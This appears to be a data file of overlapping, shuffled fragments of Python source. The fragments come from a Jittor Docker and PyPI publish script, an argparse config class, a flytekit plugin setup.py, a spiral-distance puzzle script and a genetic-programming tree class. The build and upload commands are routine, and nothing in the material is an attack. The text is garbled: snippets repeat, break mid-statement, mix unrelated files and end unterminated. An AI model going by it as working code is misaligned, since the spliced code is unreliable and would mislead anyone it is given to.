build_cmd): run_cmd(build_cmd)", "conditions defined in # file 'LICENSE.txt', which is part of", "import os def run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd) ==", "upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11", "script/Dockerfile_cuda11 . --network host\" ) docker_task( \"jittor/jittor\", \"sudo docker build", "cmd]\", cmd) assert os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync -avPu", "--build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker", "jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\" ) run_cmd(\"ssh jittor-web Documents/jittor-blog.git/hooks/post-update\")", "to pip: # rm -rf dist && python3.7 ./setup.py sdist", "run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd) == 0 def upload_file(path):", "sdist && python3.7 -m twine upload dist/* import os def", "docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host\" )", "docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname = os.path.basename(name)", "is subject to the terms and conditions defined in #", "--network host\" ) docker_task( \"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest", "&& python3.7 ./setup.py sdist && python3.7 -m twine upload dist/*", "'LICENSE.txt', which is part of this source code package. #", "this source code package. # *************************************************************** # Publish steps: #", "jittor/jittor:latest . --network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker build", "# Maintainers: # <NAME> <<EMAIL>>. # # This file is", "\"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\"", "\"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network", "This file is subject to the terms and conditions defined", "run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker", "\"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\"", "of this source code package. # *************************************************************** # Publish steps:", "python3.7 ./setup.py sdist && python3.7 -m twine upload dist/* import", "\"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest . --network host\" )", "def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname =", "2022 Jittor. All Rights Reserved. # Maintainers: # <NAME> <<EMAIL>>.", "package. # *************************************************************** # Publish steps: # 1. build,push,upload docker", "assert os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\")", "save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\")", ") docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04'", "run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker", "sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build", "steps: # 1. build,push,upload docker image[jittor/jittor] # 2. build,push,upload docker", "docker image[jittor/jittor-cuda] # upload to pip: # rm -rf dist", "&& sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker", "part of this source code package. # *************************************************************** # Publish", "-o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\",", "build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host\" ) docker_task(", "--tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\",", "FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build", "# rm -rf dist && python3.7 ./setup.py sdist && python3.7", "{path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\")", "os def run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd) == 0", "-f script/Dockerfile_cuda11 . --network host\" ) docker_task( \"jittor/jittor\", \"sudo docker", "Jittor. All Rights Reserved. # Maintainers: # <NAME> <<EMAIL>>. #", "--tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host\" ) docker_task( \"jittor/jittor\",", "{name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz", "Maintainers: # <NAME> <<EMAIL>>. # # This file is subject", "# # This file is subject to the terms and", "\"sudo docker build --tag jittor/jittor:latest . --network host\" ) docker_task(", "os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod", "# *************************************************************** # Copyright (c) 2022 Jittor. All Rights Reserved.", "\"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network", "# Publish steps: # 1. build,push,upload docker image[jittor/jittor] # 2.", "image[jittor/jittor-cuda] # upload to pip: # rm -rf dist &&", "<<EMAIL>>. # # This file is subject to the terms", "= os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo", "Publish steps: # 1. build,push,upload docker image[jittor/jittor] # 2. build,push,upload", "code package. # *************************************************************** # Publish steps: # 1. build,push,upload", "-avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push", "1. build,push,upload docker image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda] #", "os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def", "host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg" ]
[ "my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath = args.input_filepath CliArgs.LogLevel = args.log_level", "import Singleton class CliArgs(metaclass=Singleton): LogLevel = None BankName = None", "my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath = args.input_filepath", "argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName =", "Singleton class CliArgs(metaclass=Singleton): LogLevel = None BankName = None InputFilepath", "my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName = args.bank_name", "argparse from helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel = None", "= None @staticmethod def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True)", "from helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel = None BankName", "class CliArgs(metaclass=Singleton): LogLevel = None BankName = None InputFilepath =", "= None BankName = None InputFilepath = None @staticmethod def", "init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args =", "@staticmethod def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level')", "my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath =", "= None InputFilepath = None @staticmethod def init(): my_parser =", "required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath", "None InputFilepath = None @staticmethod def init(): my_parser = argparse.ArgumentParser()", "import argparse from helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel =", "BankName = None InputFilepath = None @staticmethod def init(): my_parser", "None @staticmethod def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath')", "InputFilepath = None @staticmethod def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name',", "def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args", "helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel = None BankName =", "None BankName = None InputFilepath = None @staticmethod def init():", "= my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath = args.input_filepath CliArgs.LogLevel =", "LogLevel = None BankName = None InputFilepath = None @staticmethod", "CliArgs(metaclass=Singleton): LogLevel = None BankName = None InputFilepath = None", "my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args()", "= argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName", "<gh_stars>0 import argparse from helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel", "args = my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath = args.input_filepath CliArgs.LogLevel" ]
[ "papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience", "setuptools import setup PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires", "Python :: 3.7\", \"Programming Language :: Python :: 3.8\", \"Topic", "Software Development :: Libraries\", \"Topic :: Software Development :: Libraries", "OSI Approved :: Apache Software License\", \"Programming Language :: Python", "\"Programming Language :: Python :: 3.7\", \"Programming Language :: Python", "namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\",", "\"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup( name=microlib_name,", "\"License :: OSI Approved :: Apache Software License\", \"Programming Language", "= \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the", "Python :: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering ::", "\"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__,", "Intelligence\", \"Topic :: Software Development\", \"Topic :: Software Development ::", "\"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\",", "Development :: Libraries\", \"Topic :: Software Development :: Libraries ::", ":: Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial Intelligence\", \"Topic ::", ":: Science/Research\", \"Intended Audience :: Developers\", \"License :: OSI Approved", "f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ]", "plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience ::", "Artificial Intelligence\", \"Topic :: Software Development\", \"Topic :: Software Development", "author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"],", "license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\", \"Intended Audience ::", "Language :: Python :: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic ::", "= f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\",", "Language :: Python :: 3.7\", \"Programming Language :: Python ::", "\"Topic :: Software Development\", \"Topic :: Software Development :: Libraries\",", "\"Intended Audience :: Science/Research\", \"Intended Audience :: Developers\", \"License ::", "Software License\", \"Programming Language :: Python :: 3.7\", \"Programming Language", "\"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup(", ":: Python :: 3.7\", \"Programming Language :: Python :: 3.8\",", ":: Python :: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering", "python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\", \"Intended Audience :: Developers\",", "Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial Intelligence\", \"Topic :: Software", "\"Topic :: Software Development :: Libraries :: Python Modules\", ],", "\"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\",", "classifiers=[ \"Intended Audience :: Science/Research\", \"Intended Audience :: Developers\", \"License", "Audience :: Science/Research\", \"Intended Audience :: Developers\", \"License :: OSI", "License\", \"Programming Language :: Python :: 3.7\", \"Programming Language ::", "Audience :: Developers\", \"License :: OSI Approved :: Apache Software", "\"Intended Audience :: Developers\", \"License :: OSI Approved :: Apache", "Libraries\", \"Topic :: Software Development :: Libraries :: Python Modules\",", "Apache Software License\", \"Programming Language :: Python :: 3.7\", \"Programming", "the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[", "] __version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This", "Approved :: Apache Software License\", \"Programming Language :: Python ::", "import setup PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires =", "3.7\", \"Programming Language :: Python :: 3.8\", \"Topic :: Scientific/Engineering\",", "is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\",", "\"Programming Language :: Python :: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic", ":: Scientific/Engineering :: Artificial Intelligence\", \"Topic :: Software Development\", \"Topic", "PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\",", "description=\"This is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\",", "\"Topic :: Scientific/Engineering :: Artificial Intelligence\", \"Topic :: Software Development\",", "name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit papermill plugin\",", ":: Artificial Intelligence\", \"Topic :: Software Development\", \"Topic :: Software", ":: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial", ":: Software Development\", \"Topic :: Software Development :: Libraries\", \"Topic", "Scientific/Engineering :: Artificial Intelligence\", \"Topic :: Software Development\", \"Topic ::", "3.8\", \"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial Intelligence\",", ":: Apache Software License\", \"Programming Language :: Python :: 3.7\",", "packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\", \"Intended", "Science/Research\", \"Intended Audience :: Developers\", \"License :: OSI Approved ::", "plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__", "setup PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [", "= \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\",", "[ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\"", "setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit papermill", "Development\", \"Topic :: Software Development :: Libraries\", \"Topic :: Software", "Developers\", \"License :: OSI Approved :: Apache Software License\", \"Programming", "version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"],", "\"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit", "\"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial Intelligence\", \"Topic", "from setuptools import setup PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\"", "= [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ =", "microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\",", "install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\", \"Intended Audience", "\"Topic :: Software Development :: Libraries\", \"Topic :: Software Development", ":: Software Development :: Libraries\", \"Topic :: Software Development ::", "Software Development\", \"Topic :: Software Development :: Libraries\", \"Topic ::", "author_email=\"<EMAIL>\", description=\"This is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires,", ":: Software Development :: Libraries :: Python Modules\", ], )", "__version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is", ":: Developers\", \"License :: OSI Approved :: Apache Software License\",", ":: OSI Approved :: Apache Software License\", \"Programming Language ::", ":: 3.7\", \"Programming Language :: Python :: 3.8\", \"Topic ::", ":: Libraries\", \"Topic :: Software Development :: Libraries :: Python", "flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended", "\"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\"," ]
[ "size + 2 top_right = s_size - 3 * size", "= size * size # squared size while (s_size <", "(input > top_left): input_y = input - top_left input_x =", "# bottom horizontal line if (input > bottom_left): input_x =", "- 1 input_y = input - bottom_left elif (input >", "0 input_y = size - input + top_right - 1", "1 input_y = input - bottom_left elif (input > top_left):", "2 ap_y = ap_x print abs(ap_x - input_x) + abs(ap_y", "= 0 input_y = size - input + top_right -", "= 0 elif (input > top_right): input_x = 0 input_y", "- 1 else: input_x = top_right - input input_y =", "= s_size - size + 1 top_left = s_size -", "input input_y = size - 1 ap_x = size /", "top_right - 1 else: input_x = top_right - input input_y", "* size bottom_right = s_size bottom_left = s_size - size", "* size + 3 input_x = -1 input_y = -1", "size + 3 input_x = -1 input_y = -1 #", "s_size - 2 * size + 2 top_right = s_size", "s_size - size + 1 top_left = s_size - 2", "input_y = -1 # bottom horizontal line if (input >", "2 s_size = size * size bottom_right = s_size bottom_left", "top_right - input input_y = size - 1 ap_x =", "input_y = size - 1 ap_x = size / 2", "bottom_left = s_size - size + 1 top_left = s_size", "squared size while (s_size < input): size += 2 s_size", "> top_right): input_x = 0 input_y = size - input", "0 elif (input > top_right): input_x = 0 input_y =", "= s_size - 3 * size + 3 input_x =", "* size + 2 top_right = s_size - 3 *", "input - bottom_left elif (input > top_left): input_y = input", "input - top_left input_x = 0 elif (input > top_right):", "top_right): input_x = 0 input_y = size - input +", "= size - input + top_right - 1 else: input_x", "input + top_right - 1 else: input_x = top_right -", "size / 2 ap_y = ap_x print abs(ap_x - input_x)", "elif (input > top_left): input_y = input - top_left input_x", "if (input > bottom_left): input_x = size - 1 input_y", "= -1 input_y = -1 # bottom horizontal line if", "368078 size = 1 s_size = size * size #", "else: input_x = top_right - input input_y = size -", "= size / 2 ap_y = ap_x print abs(ap_x -", "size - 1 ap_x = size / 2 ap_y =", "line if (input > bottom_left): input_x = size - 1", "< input): size += 2 s_size = size * size", "top_left = s_size - 2 * size + 2 top_right", "# squared size while (s_size < input): size += 2", "3 input_x = -1 input_y = -1 # bottom horizontal", "> top_left): input_y = input - top_left input_x = 0", "2 * size + 2 top_right = s_size - 3", "(input > top_right): input_x = 0 input_y = size -", "1 else: input_x = top_right - input input_y = size", "(s_size < input): size += 2 s_size = size *", "s_size - 3 * size + 3 input_x = -1", "- 3 * size + 3 input_x = -1 input_y", "horizontal line if (input > bottom_left): input_x = size -", "size + 1 top_left = s_size - 2 * size", "s_size bottom_left = s_size - size + 1 top_left =", "bottom_right = s_size bottom_left = s_size - size + 1", "+ 2 top_right = s_size - 3 * size +", "> bottom_left): input_x = size - 1 input_y = input", "#!/usr/bin/env python input = 368078 size = 1 s_size =", "- size + 1 top_left = s_size - 2 *", "top_right = s_size - 3 * size + 3 input_x", "size - 1 input_y = input - bottom_left elif (input", "size # squared size while (s_size < input): size +=", "1 ap_x = size / 2 ap_y = ap_x print", "python input = 368078 size = 1 s_size = size", "input_x = 0 elif (input > top_right): input_x = 0", "= top_right - input input_y = size - 1 ap_x", "1 s_size = size * size # squared size while", "size * size bottom_right = s_size bottom_left = s_size -", "= -1 # bottom horizontal line if (input > bottom_left):", "- 2 * size + 2 top_right = s_size -", "input_x = top_right - input input_y = size - 1", "+ 1 top_left = s_size - 2 * size +", "input_x = -1 input_y = -1 # bottom horizontal line", "s_size = size * size # squared size while (s_size", "= input - top_left input_x = 0 elif (input >", "top_left): input_y = input - top_left input_x = 0 elif", "input_y = input - top_left input_x = 0 elif (input", "size += 2 s_size = size * size bottom_right =", "elif (input > top_right): input_x = 0 input_y = size", "* size # squared size while (s_size < input): size", "+ top_right - 1 else: input_x = top_right - input", "input): size += 2 s_size = size * size bottom_right", "ap_x = size / 2 ap_y = ap_x print abs(ap_x", "size = 1 s_size = size * size # squared", "while (s_size < input): size += 2 s_size = size", "= ap_x print abs(ap_x - input_x) + abs(ap_y - input_y)", "+ 3 input_x = -1 input_y = -1 # bottom", "- bottom_left elif (input > top_left): input_y = input -", "top_left input_x = 0 elif (input > top_right): input_x =", "bottom_left): input_x = size - 1 input_y = input -", "bottom_left elif (input > top_left): input_y = input - top_left", "- top_left input_x = 0 elif (input > top_right): input_x", "input_y = size - input + top_right - 1 else:", "= input - bottom_left elif (input > top_left): input_y =", "= s_size bottom_left = s_size - size + 1 top_left", "= 368078 size = 1 s_size = size * size", "- input + top_right - 1 else: input_x = top_right", "-1 # bottom horizontal line if (input > bottom_left): input_x", "bottom horizontal line if (input > bottom_left): input_x = size", "= size * size bottom_right = s_size bottom_left = s_size", "1 top_left = s_size - 2 * size + 2", "size * size # squared size while (s_size < input):", "-1 input_y = -1 # bottom horizontal line if (input", "size - input + top_right - 1 else: input_x =", "= s_size - 2 * size + 2 top_right =", "= size - 1 input_y = input - bottom_left elif", "- input input_y = size - 1 ap_x = size", "ap_y = ap_x print abs(ap_x - input_x) + abs(ap_y -", "= size - 1 ap_x = size / 2 ap_y", "size while (s_size < input): size += 2 s_size =", "input_x = size - 1 input_y = input - bottom_left", "input = 368078 size = 1 s_size = size *", "= 1 s_size = size * size # squared size", "s_size = size * size bottom_right = s_size bottom_left =", "- 1 ap_x = size / 2 ap_y = ap_x", "/ 2 ap_y = ap_x print abs(ap_x - input_x) +", "(input > bottom_left): input_x = size - 1 input_y =", "+= 2 s_size = size * size bottom_right = s_size", "size bottom_right = s_size bottom_left = s_size - size +", "2 top_right = s_size - 3 * size + 3", "input_y = input - bottom_left elif (input > top_left): input_y", "input_x = 0 input_y = size - input + top_right", "3 * size + 3 input_x = -1 input_y =" ]
[ "parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree)", "get_flat_parameters(self): params = [] for tree in self.parameterized_trees: for node", "in_order(self): yield self if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children:", "= underlying_tree if init_fct is None: self.set_params([1, 0]) else: self.set_params(init_fct())", "set_params(self, params): self.weight, self.bias = params self.name = self.underlying_tree.name +", "return [tree(*x) for tree in self.parameterized_trees] def __len__(self): return sum(len(tree)", "__init__(self, underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree) #", "racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): # This makes the assumption", "node in child.in_order(): yield node class ParameterizedIndividual: def __init__(self, parameterized_trees):", "child.in_order(): yield node class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees =", "sum(len(tree) for tree in self.parameterized_trees) def set_flat_parameters(self, params): n_used =", "node in tree.in_order(): node.set_params(list(params[n_used : n_used + 2])) n_used +=", "n_used += 2 def get_flat_parameters(self): params = [] for tree", "__call__(self, *x): return self.underlying_tree(*x) * self.weight + self.bias def __len__(self):", "= parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree", "params = [] for tree in self.parameterized_trees: for node in", "makes the assumption that all children of the underlying tree", "set_flat_parameters(self, params): n_used = 0 for tree in self.parameterized_trees: for", "yield node class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees", "that the underlying tree has the field .name def __init__(self,", "trees should not be mutated\") def in_order(self): yield self if", "__len__(self): return sum(len(tree) for tree in self.parameterized_trees) def set_flat_parameters(self, params):", "self.parameterized_trees) def set_flat_parameters(self, params): n_used = 0 for tree in", "= self.underlying_tree.name + \" * {} + {}\".format( self.weight, self.bias", "for child in underlying_tree.children ] self.underlying_tree = underlying_tree if init_fct", "for tree in self.parameterized_trees) def set_flat_parameters(self, params): n_used = 0", "in self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used : n_used +", "def __init__(self, underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree)", "of the underlying tree are in a field .children and", ": n_used + 2])) n_used += 2 def get_flat_parameters(self): params", "else: self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias = params self.name", "__call__(self, *x): return [tree(*x) for tree in self.parameterized_trees] def __len__(self):", "tree in self.parameterized_trees) def set_flat_parameters(self, params): n_used = 0 for", "+ \"\\n\" if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: res", "if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: for node in", "prefix) return res def _set_dirty(self): raise Exception(\"Parameterized trees should not", "class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def", "ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x) for tree in self.parameterized_trees]", "@staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x)", "] self.underlying_tree = underlying_tree if init_fct is None: self.set_params([1, 0])", "+ 